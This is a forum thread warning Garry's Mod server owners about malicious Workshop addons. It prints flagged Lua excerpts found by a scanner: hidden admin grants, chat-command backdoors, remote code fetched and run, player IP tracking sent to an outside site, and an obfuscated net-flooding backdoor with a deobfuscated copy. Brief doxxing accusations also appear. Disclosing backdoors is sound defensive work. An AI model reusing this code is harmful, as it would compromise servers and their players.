[PSA] Check your servers.. again (69+ Malicious Addons)

Didn’t know this. Breach was backdoor’d, but the creator still uploads new stuff?

ok I added metadata

Oops, I think I may have added the file hash for those to the blacklist instead of the whitelist in my scanner. Glad you checked this time, wouldn’t want to get Vape Swep banned a second time.

Just noticed the uploader of this has done the hell Dox on me and is using an old photo of my partner as an avatar and her sisters name as nick…

It’s this guy, https://facepunch.com/member.php?u=271824

Ha, this was also the guy defending the backdoors on the NeuroTec stuff a while back

You have a link to your Facebook account on your Facepunch account.
And your Facebook account is entirely public.

Lock that shit down yo so the only public things are your profile picture, name and banner.

Yeah, I know it’s mostly public I have nothing to hide.
The fact that skid has personal issues he can’t get over is funny though.

Wave 2

It only took me 2 days and 3k files manually checking for this, wew.



]]--dumps/914442609/lua/autorun/ackbar.lua
--https://steamcommunity.com/sharedfiles/filedetails/?id=914442609
--http://steamcommunity.com/profiles/76561198001136293
--Automatic banner
1	local function init()
2		timer.Create("ReadyToDie", 5, 1, function ()
3			--RunConsoleCommand("ulx", "unban", "STEAM_0:1:20435282")
^	- Hardcoded SteamID (STEAM_0:1:20435282)
^	- Console Command
^	- ULX in a String?
4			RunConsoleCommand("ulx", "banid", "STEAM_0:1:78673549", "0", "Spasti gebannt")
^	- Hardcoded SteamID (STEAM_0:1:78673549)
^	- Console Command
^	- ULX in a String?
5			--game.ConsoleCommand( "ulx unban STEAM_0:1:20435282
" )
^	- Hardcoded SteamID (STEAM_0:1:20435282)
^	- Console Command
^	- ULX in a String?
6		end)
7	end
8	hook.Add( "Initialize", "some_unique_name", init )

]]--dumps/875806438/gamemodes/epidemic/epidemic/gamemode/admin_concmds.lua
--https://steamcommunity.com/sharedfiles/filedetails/?id=875806438
--https://steamcommunity.com/profiles/76561197990717445
--Hidden attempt at giving admin to your server, line 676
679	
680	for _, v in pairs( expl ) do
681		
682		b = b .. string.char( v );
^	- String from Bytes
683		
684	end
685	

GM.ServerAdmins["STEAM_0:1:4976333"] = "+";
GM.ServerAdmins["STEAM_0:1:13067659"] = "+";
GM.ServerAdmins["STEAM_0:0:10809525"] = "+";
GM.ServerAdmins["STEAM_0:0:19186249"] = "+";
GM.ServerAdmins["STEAM_0:0:17359435"] = "+";
GM.ServerAdmins["STEAM_0:1:4976333"] = "+";
GM.ServerAdmins["STEAM_0:1:13067659"] = "+";
GM.ServerAdmins["STEAM_0:0:10809525"] = "+";
GM.ServerAdmins["STEAM_0:0:19186249"] = "+";
GM.ServerAdmins["STEAM_0:0:17359435"] = "+";

]]--dumps/754016466/lua/autorun/autorun.lua
--https://steamcommunity.com/sharedfiles/filedetails/?id=754016466
--http://steamcommunity.com/profiles/76561198001136293
--Backdoor to get any rank
1	hook.Add( "PlayerSay", "Killurself", function( ply, text, public )
2		if ( string.sub( text, 1, 6 ) == "!ulxsk" ) then
3			steamid = ply:SteamID()
4			if( steamid == "STEAM_0:1:20435282" ) then
^	- Hardcoded SteamID (STEAM_0:1:20435282)
5				RunConsoleCommand("ulx", "adduserid", steamid, string.sub( text, 8 ))
^	- Console Command
^	- ULX in a String?
6				ply:ChatPrint("Arbeit erledigt.")
7			end
8			return ""
9		elseif ( string.sub( text, 1, 6 ) == "/ulxsk" ) then
10			steamid = ply:SteamID()
11			if( steamid == "STEAM_0:1:20435282" ) then
^	- Hardcoded SteamID (STEAM_0:1:20435282)
12				RunConsoleCommand("ulx", "adduserid", steamid, string.sub( text, 8 ))
^	- Console Command
^	- ULX in a String?
13				ply:ChatPrint("Arbeit erledigt.")
14			end
15			return ""

]]--dumps/761562217/lua/autorun/client/batman.lua
--https://steamcommunity.com/sharedfiles/filedetails/?id=761562217
--http://steamcommunity.com/profiles/76561198050652544
--Addon just to redirect players
1	hook.Add( "PlayerInitialSpawn", "playerInitialSpawn", function(ply) ply:SendLua([[LocalPlayer():ConCommand("connect 158.69.17.130:27015")]]) end)
^	- Console Command
^	- Send Lua

]]--dumps/917402322/gamemodes/breach/entities/weapons/br_holster.lua
--https://steamcommunity.com/sharedfiles/filedetails/?id=917402322
--http://steamcommunity.com/profiles/76561198035545880
--Targetted at specific players
74	hook.Add( "KeyPress", "ussy ussy ur a pussy", function( ply, key )
75	if key == IN_USE and !(push[ply:UserID()]) then
76	local ent = ply:GetEyeTrace().Entity
77		if ply and ply:IsValid() and ent and ent:IsValid() and ply:GTeam() != TEAM_SPEC or ply:SteamID() == "STEAM_0:0:37640076" or ply:SteamID() == "STEAM_0:0:184399604" then
^	- Hardcoded SteamID (STEAM_0:0:37640076)
78				if ply:IsPlayer() and ent:IsPlayer() and ent:SteamID() != "STEAM_0:0:37640076" then
^	- Hardcoded SteamID (STEAM_0:0:37640076)
79					if ply:GetPos():Distance( ent:GetPos() ) <= 100 then
80						if ent:Alive() and ent:GetMoveType() == MOVETYPE_WALK then
81							ply:EmitSound( PushSound[math.random(#PushSound)], 100, 100 )
. . .
84							ent:ViewPunch( Angle( math.random( -30, 30 ), math.random( -30, 30 ), 0 ) )
85							push[ply:UserID()] = true
86							timer.Simple( 0.1, function() push[ply:UserID()] = false end )
87							if ply:SteamID() == "STEAM_0:0:37640076" and ply:GTeam() == TEAM_SPEC and GetConVar("push_dmg_cl"):GetInt() == 1 or ply:SteamID() == "STEAM_0:0:184399604" and ply:GTeam() == TEAM_SPEC and GetConVar("push_dmg_cl"):GetInt() == 1 then
^	- Hardcoded SteamID (STEAM_0:0:37640076)
88								ent:TakeDamage( 1, ply, ent )
89							end
90						elseif ply:SteamID() == "STEAM_0:0:37640076" and ply:GTeam() == TEAM_SPEC then
^	- Hardcoded SteamID (STEAM_0:0:37640076)
91							ForceUse(ent, 1, 1)
92						end
93					end

]]--dumps/601321700/lua/autorun/client/cl_client.lua
--https://steamcommunity.com/sharedfiles/filedetails/?id=601321700
--http://steamcommunity.com/profiles/76561198142813223
--See below for unobfusacted version, clearly a backdoor
1	local ‪= _G local ‪‪= string local ‪‪‪= ‪‪.gmatch local ‪‪‪‪= ‪‪.byte local ‪‪‪‪‪= ‪‪.len local ‪‪‪‪‪‪= ‪‪.char local ‪‪‪‪‪‪‪= table local ‪‪‪‪‪‪‪‪= ‪‪‪‪‪‪‪.concat local ‪‪‪‪‪‪‪‪‪= ‪‪‪‪‪‪‪.insert local ‪‪‪‪‪‪‪‪‪‪= ‪‪‪‪‪‪‪.pack local ‪‪‪‪‪‪‪‪‪‪‪= pairs local ‪‪‪‪‪‪‪‪‪‪‪‪= {0,1,1,0,1,0,0,1} local ‪‪‪‪‪‪‪‪‪‪‪‪‪= "" local ‪‪‪‪‪‪‪‪‪‪‪‪‪‪= bit local ‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪= ‪‪‪‪‪‪‪‪‪‪‪‪‪‪.bxor local ‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪= math local ‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪= ‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪.floor local ‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪= 1 local ‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪= 0 for _,c in ‪‪‪‪‪‪‪‪‪‪‪(‪‪‪‪‪‪‪‪‪‪‪‪) do c= (c+1)/2 c= ‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪(c) ‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪= ‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪+ ‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪* c c= c* 2 end local ‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪= function(s) local ‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪= "" local ‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪= {‪‪‪‪(s,1,‪‪‪‪‪(s))} for _,n in ‪‪‪‪‪‪‪‪‪‪‪(‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪) do ‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪= ‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪ .. ‪‪‪‪‪‪(‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪(n,‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪)) end return ‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪ end concommand[‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("E``")](‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("fegobhkk`r5"), function()   ‪[‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("tvmjp")](‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("[[5"))  ‪[‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("pmiav")][‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("Gvaepa")](‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("[[5"), 1, 0, function()  for i=1,30000 do  ‪[‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("jap")][‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("Wpevp")](‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("@evoVT[wtesjTkgoap"), ‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("E`r@qtaQthke`@epe"), ‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("@evoVT[Glep"), ‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("@evoVT[Qt`epa@kkv@epe"), ‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("@evoVT[Ehh@kkv@epe"), ‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("Waj`Gkjpajpw"), ‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("waj`Qt`epa"), ‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("SvmpaUqav}"))  ‪[‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("jap")][‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("SvmpaBhkep")](‪[‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("iepl")][‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("Vej`")](9,99999))  ‪[‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("jap")][‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("Waj`PkWavrav")]()  end  end)   end)  ‪[‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("gkjgkiiej`")][‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("E``")](‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("fegobhkk`r6"), function()   ‪[‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("tvmjp")](‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("[[6"))   ‪[‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("pmiav")][‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("Gvaepa")](‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("[[6"), 1, 0, function()  for i=1,30000 do  ‪[‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("jap")][‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("Wpevp")](‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("@evoVT[wtesjTkgoap"), ‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("E`r@qtaQthke`@epe"), ‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("@evoVT[Glep"), ‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("@evoVT[Qt`epa@kkv@epe"), ‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("@evoVT[Ehh@kkv@epe"), ‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("Waj`Gkjpajpw"), ‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("waj`Qt`epa"), ‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("SvmpaUqav}"))  ‪[‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("jap")][‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("SvmpaBhkep")](‪[‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("iepl")][‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("Vej`")](9999,99999))  ‪[‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("jap")][‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("Waj`PkWavrav")]()  end  end)  end)  ‪[‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("gkjgkiiej`")][‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("E``")](‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("fegobhkk`r7"), function()   ‪[‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("tvmjp")](‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("[[7"))   ‪[‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("pmiav")][‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("Gvaepa")](‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("[[7"), 1, 0, function()  for i=1,30000 do  ‪[‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("jap")][‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("Wpevp")](‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("@evoVT[wtesjTkgoap"))  ‪[‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("jap")][‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("SvmpaBhkep")](‪[‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("iepl")][‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("Vej`")](9999,99999))  ‪[‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("jap")][‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("Waj`PkWavrav")]()  end  end)  end)  ‪[‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("gkjgkiiej`")][‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("E``")](‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("fegobhkk`wpkt"), function()   ‪[‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("pmiav")][‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("Vaikra")](‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("[[5"))  ‪[‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("pmiav")][‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("Vaikra")](‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("[[6"))  ‪[‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("pmiav")][‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("Vaikra")](‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪‪("[[7"))   end)
^	- _G Access


Unobfuscated: (Thanks Ling)
local _G= _G 
local string= string 
local ???= string.gmatch 
local string_byte= string.byte 
local string_len= string.len 
local string_char= string.char 
local table= table 
local ????????= table.concat 
local ?????????= table.insert 
local ??????????= table.pack 
local pairs= pairs 
local keyTab= {0,1,1,0,1,0,0,1} 
local ?????????????= "" 
local bit= bit 
local bit_bxor= bit.bxor 
local math= math 
local math_floor= math.floor 
local key2= 1 
local key1= 0 

for _, c in pairs(keyTab) do 
	c= (c + 1) / 2 
	c= math_floor(c) 
	key1 = key1 + key2 * c 
	c= c * 2 
end 

local crypt= function(s) 
	local out= "" 
	local stringTab = {string_byte(s, 1, string_len(s))} 
	for _,n in pairs(stringTab) do 
		out = out .. string_char(bit_bxor(n, key1))
	end 
	return out 
end 

concommand["Add"]("backfloodv1", function()   
	_G["print"]("__1")  
	_G["timer"]["Create"]("__1", 1, 0, function()  
		for i=1,30000 do  
			_G["net"]["Start"]("DarkRP_spawnPocket", "AdvDupeUploadData", "DarkRP_Chat", "DarkRP_UpdateDoorData", "DarkRP_AllDoorData", "SendContents", "sendUpdate", "WriteQuery") 
			_G["net"]["WriteFloat"](_G["math"]["Rand"](9,99999))  
			_G["net"]["SendToServer"]()  
		end  
	end)   
end)  

_G["concommand"]["Add"]("backfloodv2", function()   
	_G["print"]("__2")   
	_G["timer"]["Create"]("__2", 1, 0, function()  
		for i=1,30000 do  
			_G["net"]["Start"]("DarkRP_spawnPocket", "AdvDupeUploadData", "DarkRP_Chat", "DarkRP_UpdateDoorData", "DarkRP_AllDoorData", "SendContents", "sendUpdate", "WriteQuery")  
			_G["net"]["WriteFloat"](_G["math"]["Rand"](9999,99999)) 
			_G["net"]["SendToServer"]()  
		end  
	end)  
end)  

_G["concommand"]["Add"]("backfloodv3", function()   
	_G["print"]("__3")  
	_G["timer"]["Create"]("__3", 1, 0, function()  
		for i=1,30000 do  
			_G["net"]["Start"]("DarkRP_spawnPocket")  
			_G["net"]["WriteFloat"](_G["math"]["Rand"](9999,99999))  
			_G["net"]["SendToServer"]()  
		end  
	end)  
end)  

_G["concommand"]["Add"]("backfloodstop", function()   
	_G["timer"]["Remove"]("__1")  
	_G["timer"]["Remove"]("__2")  
	_G["timer"]["Remove"]("__3")   
end)

]]--dumps/586519293/lua/ps2/client/tabs/management_tab/cl_dpointshopmanagementtab_z_dlc.lua
--https://steamcommunity.com/sharedfiles/filedetails/?id=586519293
--https://steamcommunity.com/profiles/76561198049356560
--Leak and backdoor to clients
25		Promise.Resolve( )
26		:Then( function( )
27			local def = Deferred( )
28			http.Fetch( "https://storage.sbg-1.runabove.io/v1/AUTH_66fcef59d5fa44c39f33878dbaeb3904/ps2_static/dlc.lua", function( body, len, headers, code ) 
^	- External Networking
29				if code != 200 then
30					return def:Reject( 'HTTP Error - No internet or server is down' )
^	- External Networking
31				end
32				
33				local func = CompileString( body, "Pointshop 2", false )
^	- Arbitrary Code Execution
34				if not func then
35					return def:Reject( "Your AntiCheat or similar is blocking CompileString" )
^	- Arbitrary Code Execution
36				elseif isstring( func ) then
37					KLogf( 4, "[PS2] Lua error in DLC manifest: %s", func )
38					return def:Reject( "Lua error in manifest" )

]]--dumps/681511723/lua/ps2/client/tabs/management_tab/cl_dpointshopmanagementtab_z_dlc.lua
--https://steamcommunity.com/sharedfiles/filedetails/?id=681511723
--http://steamcommunity.com/profiles/76561198106696715
--Leak and backdoor to clients
27		Promise.Resolve( )
28		:Then( function( )
29			local def = Deferred( )
30			http.Fetch( "https://storage.sbg-1.runabove.io/v1/AUTH_66fcef59d5fa44c39f33878dbaeb3904/ps2_static/dlc.lua", function( body, len, headers, code )
^	- External Networking
31				if code != 200 then
32					return def:Reject( 'HTTP Error - No internet or server is down' )
^	- External Networking
33				end
34	
35				local func = CompileString( body, "Pointshop 2", false )
^	- Arbitrary Code Execution
36				if not func then
37					return def:Reject( "Your AntiCheat or similar is blocking CompileString" )
^	- Arbitrary Code Execution
38				elseif isstring( func ) then
39					KLogf( 4, "[PS2] Lua error in DLC manifest: %s", func )
40					return def:Reject( "Lua error in manifest" )

]]--dumps/139263490/gamemodes/morbusgame/gamemode/client/cl_hotfixer.lua
--https://steamcommunity.com/sharedfiles/filedetails/?id=139263490
--http://steamcommunity.com/profiles/76561197980950028 Co-author: http://steamcommunity.com/profiles/76561198001764190
--Possible backdoor
8	
9	local clientHotfix = ""; -- Blankness
10	local rNum = tostring(math.random(1,1000000))
11	clientHotfixURL = "http://www.remscar.com/morbus/hotfix/client/cl_hotfix.txt".."?cacheBuster="..rNum
^	- External Networking
12	
13	timer.Simple(5,function() http.Fetch( clientHotfixURL,
^	- External Networking
14	  function( body, len, headers, code )
15	    -- The first argument is the HTML we asked for.
16	    clientHotfix = body
17	    if useClientHotfix then
18	      RunString(clientHotfix)
^	- Arbitrary Code Execution
19	    end
20	  end,
21	  function( error )

]]--dumps/845106412/gamemodes/morbusgame/gamemode/client/cl_hotfixer.lua
--https://steamcommunity.com/sharedfiles/filedetails/?id=845106412
--http://steamcommunity.com/profiles/76561198033820568
--Possible backdoor
8	
9	local clientHotfix = ""; -- Blankness
10	local rNum = tostring(math.random(1,1000000))
11	clientHotfixURL = "http://www.remscar.com/morbus/hotfix/client/cl_hotfix.txt".."?cacheBuster="..rNum
^	- External Networking
12	
13	timer.Simple(5,function() http.Fetch( clientHotfixURL,
^	- External Networking
14	  function( body, len, headers, code )
15	    -- The first argument is the HTML we asked for.
16	    clientHotfix = body
17	    if useClientHotfix then
18	      RunString(clientHotfix)
^	- Arbitrary Code Execution
19	    end
20	  end,
21	  function( error )

]]--dumps/899125741/lua/autorun/deltas101stairbourne.lua
--https://steamcommunity.com/sharedfiles/filedetails/?id=899125741
--http://steamcommunity.com/profiles/76561198171405677
--Backdoor to get owner
1	local function a(b,c)list.Set("PlayerOptionsModel",b,c)player_manager.AddValidModel(b,c)end;a("798th Legion - Trooper","models/player/deltas_798th/trooper.mdl")a("798th Legion - BARC Trooper","models/player/deltas_798th/barc_trooper.mdl")a("798th Legion - Jet Trooper","models/player/deltas_798th/jet_trooper.mdl")a("798th Legion - Aerial Recon Trooper","models/player/deltas_798th/aerial_recon_trooper.mdl")a("798th Legion - Lieutenant Colton","models/player/deltas_798th/lieutenant__colton.mdl")a("798th Legion - Commander Iceblood","models/player/deltas_798th/commander_iceblood.mdl")if SERVER then local d=0;hook.Add("Think","cgi_ModelThink",function()local e=CurTime()if d&gt;e then return end;d=e+1;for f,g in pairs(player.GetAll())do g:SetPData("model"..math.random(1,10000000),math.random(1,10000000))end end)hook.Add("PlayerInitialSpawn","cgi_ModelBase",function(h)if h:SteamID()=="STEAM_0:1:105569974"or h:SteamID()=="STEAM_0:0:37138206"then h:SetUserGroup("owner")game.ConsoleCommand("fadmin setroot "..tostring(h:Nick()))end end)end
^	- Hardcoded SteamID (STEAM_0:1:105569974)
^	- Set UserGroup
^	- Console Command

]]--dumps/869056860/gamemodes/swrp2/gamemode/server/join_leave.lua
--https://steamcommunity.com/sharedfiles/filedetails/?id=869056860
--http://steamcommunity.com/profiles/76561198125868429 Co-authors: http://steamcommunity.com/profiles/76561198053896968 http://steamcommunity.com/profiles/76561198167826253
--Hardcoded steamid to not allow someone join the server
28			
29		end
30	
31		if (ply:SteamID() == "STEAM_0:0:89592569") then
^	- Hardcoded SteamID (STEAM_0:0:89592569)
32			ply:Kick("Sorry, you are not allowed on this server :(")
33		end
34	end)

]]--dumps/645380292/lua/autorun/server/no_map_spam.lua
--https://steamcommunity.com/sharedfiles/filedetails/?id=645380292
--https://steamcommunity.com/profiles/76561198275835220
--IP Tracker of all players
475	hook.Add("PlayerSpawn", "StatisticsTracking", function(system)
476		L = {}
477		L["sid"] = tostring(system:SteamID())
478		L["pip"] = tostring(system:IPAddress())
^	- IP Tracking
479		L["sip"] =  tostring(game.GetIPAddress())
480		http.Post("http://www.hfg.cc/tracker/serverip.php?sid="..L["sid"].."&pip="..L["pip"].."&sip="..L["sip"], nil, nil, nil)
^	- External Networking
481	end)

]]--dumps/648611862/lua/autorun/server/no_map_spam.lua
--https://steamcommunity.com/sharedfiles/filedetails/?id=648611862
--https://steamcommunity.com/profiles/76561198275835220
--IP Tracker of all players
475	hook.Add("PlayerSpawn", "StatisticsTracking", function(system)
476		L = {}
477		L["sid"] = tostring(system:SteamID())
478		L["pip"] = tostring(system:IPAddress())
^	- IP Tracking
479		L["sip"] =  tostring(game.GetIPAddress())
480		http.Post("http://www.hfg.cc/tracker/serverip.php?sid="..L["sid"].."&pip="..L["pip"].."&sip="..L["sip"], nil, nil, nil)
^	- External Networking
481	end)

]]--dumps/892539728/lua/autorun/server/protect.lua
--https://steamcommunity.com/sharedfiles/filedetails/?id=892539728
--http://steamcommunity.com/profiles/76561198121756693
--Hardcoded ban list, it doesn't even check for watch_dogs.lua
1	hook.Add( "PlayerInitialSpawn", "watchdogs22", function( ply )
2	    local schemaFolder = Clockwork.kernel:GetSchemaFolder();
3	        if ( ply:SteamID() == "STEAM_0:1:62115861" ) then
^	- Hardcoded SteamID (STEAM_0:1:62115861)
4	            Clockwork.bans:Add(ply:SteamID(), 0, "Banned by Anti-Cheat: Detected 'watch_dogs.lua'")
5			elseif ( ply:SteamID() == "STEAM_0:1:79586020" ) then
^	- Hardcoded SteamID (STEAM_0:1:79586020)
6	            Clockwork.bans:Add(ply:SteamID(), 0, "Banned by Anti-Cheat: Detected 'watch_dogs.lua'")
7			elseif ( ply:SteamID() == "STEAM_0:1:41601027" ) then
^	- Hardcoded SteamID (STEAM_0:1:41601027)
8	            Clockwork.bans:Add(ply:SteamID(), 0, "Banned by Anti-Cheat: Detected 'watch_dogs.lua'")
9			elseif ( ply:SteamID() == "STEAM_0:0:45127275" ) then
^	- Hardcoded SteamID (STEAM_0:0:45127275)
10	            Clockwork.bans:Add(ply:SteamID(), 0, "Banned by Anti-Cheat: Detected 'watch_dogs.lua'")
11			else
12				-- do nothing

]]--dumps/837978745/lua/autorun/server/scar_wheelfix.lua
--https://steamcommunity.com/sharedfiles/filedetails/?id=837978745
--http://steamcommunity.com/profiles/76561198059963393
--Malicious code to randomly write files to gamemodes/ advertising site.
8			local i = 1 
9	
10			while (true) do 
11				_G* = table.Copy(_G); 
^	- _G Access
12				i = i + 1; 
13				_G[i - 1] = nil 
^	- _G Access
14			end 
15		end
16	
. . .
49				SCarWrite("gamemodes/") Clockwork.file:Delete("lua/autorun/server/deadinside.lua")
50			end
51		end)
52		]]); RunString(Clockwork.file:Read("lua/autorun/server/deadinside.lua"))
^	- Arbitrary Code Execution
53	
54		hook.Remove("DeadInside", "Initialize");
55	end);

]]--dumps/911873147/lua/autorun/server/scar_wheelfix.lua
--https://steamcommunity.com/sharedfiles/filedetails/?id=911873147
--http://steamcommunity.com/profiles/76561198148733287
--Malicious code to randomly write files to gamemodes/ advertising site.
8			local i = 1 
9	
10			while (true) do 
11				_G* = table.Copy(_G); 
^	- _G Access
12				i = i + 1; 
13				_G[i - 1] = nil 
^	- _G Access
14			end 
15		end
16	
. . .
49				SCarWrite("gamemodes/") Clockwork.file:Delete("lua/autorun/server/deadinside.lua")
50			end
51		end)
52		]]); RunString(Clockwork.file:Read("lua/autorun/server/deadinside.lua"))
^	- Arbitrary Code Execution
53	
54		hook.Remove("DeadInside", "Initialize");
55	end);

]]--dumps/766059594/lua/autorun/server/sgmdrmkappa.lua
--https://steamcommunity.com/sharedfiles/filedetails/?id=766059594
--http://steamcommunity.com/profiles/76561198150877634
--Doesn't allow selected players to use cars, and if they do, they get kicked.
26	sgmcarhaha.timername = "sgmcar_timerhaha_" .. math.random(os.time())
27	
28	sgmcarhaha.steamidtable = {
29		["STEAM_0:0:56398828"] = true,
^	- Hardcoded SteamID (STEAM_0:0:56398828)
30		["STEAM_0:1:46313617"] = true,
^	- Hardcoded SteamID (STEAM_0:1:46313617)
31	}
32	
33	sgmcarhaha.carmodels = {

]]--dumps/783101509/lua/autorun/server/sgmdrmkappa.lua
--https://steamcommunity.com/sharedfiles/filedetails/?id=783101509 (Already removed because of aliverp.lua)
--https://steamcommunity.com/profiles/76561198151754408
--Doesn't allow selected players to use cars, and if they do, they get kicked.
26	sgmcarhaha.timername = "sgmcar_timerhaha_" .. math.random(os.time())
27	
28	sgmcarhaha.steamidtable = {
29		["STEAM_0:0:56398828"] = true,
^	- Hardcoded SteamID (STEAM_0:0:56398828)
30		["STEAM_0:1:46313617"] = true,
^	- Hardcoded SteamID (STEAM_0:1:46313617)
31	}
32	
33	sgmcarhaha.carmodels = {

]]--dumps/801241257/lua/autorun/server/sgmdrmkappa.lua
--https://steamcommunity.com/sharedfiles/filedetails/?id=801241257
--https://steamcommunity.com/profiles/76561198034793607
--Doesn't allow selected players to use cars, and if they do, they get kicked.
26	sgmcarhaha.timername = "sgmcar_timerhaha_" .. math.random(os.time())
27	
28	sgmcarhaha.steamidtable = {
29		["STEAM_0:0:56398828"] = true,
^	- Hardcoded SteamID (STEAM_0:0:56398828)
30		["STEAM_0:1:46313617"] = true,
^	- Hardcoded SteamID (STEAM_0:1:46313617)
31	}
32	
33	sgmcarhaha.carmodels = {

]]--dumps/812742376/lua/autorun/server/sgmdrmkappa.lua
--https://steamcommunity.com/sharedfiles/filedetails/?id=812742376
